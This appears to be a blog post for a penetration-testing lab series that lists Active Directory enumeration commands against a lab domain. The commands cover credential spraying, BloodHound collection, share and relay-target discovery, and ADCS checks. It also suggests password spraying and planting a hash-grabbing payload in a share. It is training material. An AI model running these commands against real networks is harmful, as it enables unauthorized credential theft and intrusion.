Post

VL Shinra Part 2 - Enumerate, Enumerate, Enumerate!

VL Shinra Part 2 - Enumerate, Enumerate, Enumerate!

This is the second video of the Shinra series. Before setting foot onto any of the network’s internal machines, we are going to spend a bit of time enumerating various things from our machine.

Some ideas for further steps that are not shown in the video:

  • Spray “Shinra2022” or variations of it against all users in the domain.
  • Place a hash grabbing payload (e.g. https://github.com/xct/hashgrab) inside the workspace share and see if you can find any hashes.

Notes

Tools

Tcpdump

1
tcpdump -i ens37 -s 0 -w - -U | tee output.pcap | tcpdump -r -

Credential spraying

1
crackmapexec smb 172.16.11.10 -u user.txt -p pass.txt --no-bruteforce --continue-on-success

Bloodhound

1
2
3
sudo sh -c 'proxychains python3 /home/xct/tools/dnschef/dnschef.py --fakeip 172.16.11.101 --fakedomains shinra-dev.vl -q'

proxychains bloodhound-python -c all --disable-pooling -w 1 -u "william.davis" -p 'password' -d shinra-dev.vl -dc dc.shinra-dev.vl -ns 127.0.0.1

Shares

1
crackmapexec smb 172.16.11.3-254 -u "william.davis" -p 'password' --shares

SMB Signing

1
crackmapexec smb 172.16.11.3-254 --gen-relay-list relay.txt

Machine Account Quota

1
crackmapexec ldap 172.16.11.101 -u "william.davis" -p 'password' -M maq

ADCS

1
2
3
crackmapexec ldap 172.16.11.101 -u "william.davis" -p 'password' -M adcs
crackmapexec ldap 172.16.11.101 -u "william.davis" -p 'password' -M adcs -o SERVER=shinra-dev-CA
certipy find -u "william.davis" -p 'password' -dc-ip 172.16.11.101 
This post is licensed under CC BY 4.0 by the author.